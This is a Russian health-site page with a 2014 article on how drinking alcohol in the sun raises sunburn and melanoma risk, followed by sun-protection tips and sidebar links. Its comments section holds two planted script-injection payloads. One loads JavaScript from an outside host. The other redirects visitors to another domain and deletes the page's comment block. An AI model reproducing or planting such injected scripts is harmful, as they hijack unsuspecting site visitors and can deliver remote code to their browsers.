Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Отдыхаете на пляже, выпив...  >>  Отдыхаете на пляже, выпиваете? Вот что алкоголь делает с кожей на солнце
 
Обратная связь
 

Отдыхаете на пляже, выпиваете? Вот что алкоголь делает с кожей на солнце

Размер шрифта
30 июля 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Пина колада, дайкири и другие алкогольные напитки – важная часть отличного отдыха на пляже, однако новые исследования показали, что стоит дважды подумать, прежде чем заказывать коктейль с ярким зонтиком – их употребление на солнце может повысить шансы заболеть раком кожи.

Отдыхаете на пляже, выпиваете? Вот что алкоголь делает с кожей на солнце

Недавний анализ 16 исследований, опубликованный в Британском журнале дерматологии, показывает, что употребление более одного коктейля в день связано с 20% повышением риска развития меланомы – самого опасного из всех видов рака кожи. Более ранние работы говорят о том, что люди, выпивающие во время отдыха на пляже, чаще получают солнечные ожоги. Причина заключается вот в чем: после употребления алкоголя организм метаболизирует его в вещество под названием ацетальдегид. Последний делает кожу более чувствительной к ультрафиолетовому излучению солнца, а это излучение, в свою очередь, повышает вероятность повреждения клеток, которое может вести к развитию рака.
Также играет свою роль тот факт, что выпивающие на отдыхе люди могут просто быть менее бдительными в отношении защиты от солнца. «Когда вы пьете на пляже, вы с меньшей вероятностью будете заботиться о должном использовании солнцезащитных средств», – рассказывает доктор Майкл Шапиро, медицинский директор дерматологической клиники в Нью-Йорке.
Однако если соблюдение трезвости на пляже вам не по душе, вот простые правила, которые помогут безопасно проводить время на солнце:
  • Намажьтесь солнцезащитным кремом за тридцать минут до выхода. Это не только позволит крему полностью впитаться в кожу, но также даст уверенность в том, что на коже не осталось незащищенных мест. «Сделав это заранее, вы можете не бояться забыть о защите от солнца в том случае, если сильно опьянеете», – говорит Шапиро.
  • Создайте себе ограничение в один коктейль. Употребление одного коктейля в день не увеличивает риск возникновения рака кожи. К тому же в таком случае вы с большей вероятностью вспомните о том, что нужно снова нанести солнцезащитный крем.
  • Попросите кого-нибудь напоминать вам о защите от солнца. Если вы пьянеете даже от одного коктейля, такая договоренность очень вам поможет. «Это почти как иметь трезвого водителя. Найдите кого-нибудь, кто не пьет, и попросите напоминать вам, когда нужно наносить солнцезащитное средство», – говорит Шапиро. Обычно это необходимо делать каждые два часа, а также после каждого купания.
Весело отдохнуть на солнечных пляжах можно и без алкоголя – ваша кожа будет вам весьма благодарна за это. Но если уж очень хочется выпить – соблюдение приведенных здесь простых правил позволит сохранить здоровье кожи и избежать рака.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:35

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:32

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Рак кожи или просто родинка? Как отличить?   Бегом на улицу! Солнце понижает давление!   День диагностики меланомы   Кто живет внутри вас? Бактерии! Да еще приводят к раку!  
14 июня 2013Рыжий, рыжий, конопатый... А теперь еще и с раком! Ген рыжих волос приводит к раку кожи! Как защититься 01 ноября 2013ИНВИТРО – «Марка №1» в России
 
21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт» 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 

Слайдшоу

1
Как курение влияет на вашу кожу
Как улучшить результаты анализов. Часть 2
Что съесть, чтобы не было рака

Тесты

1
Как устроены волосы человека?
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.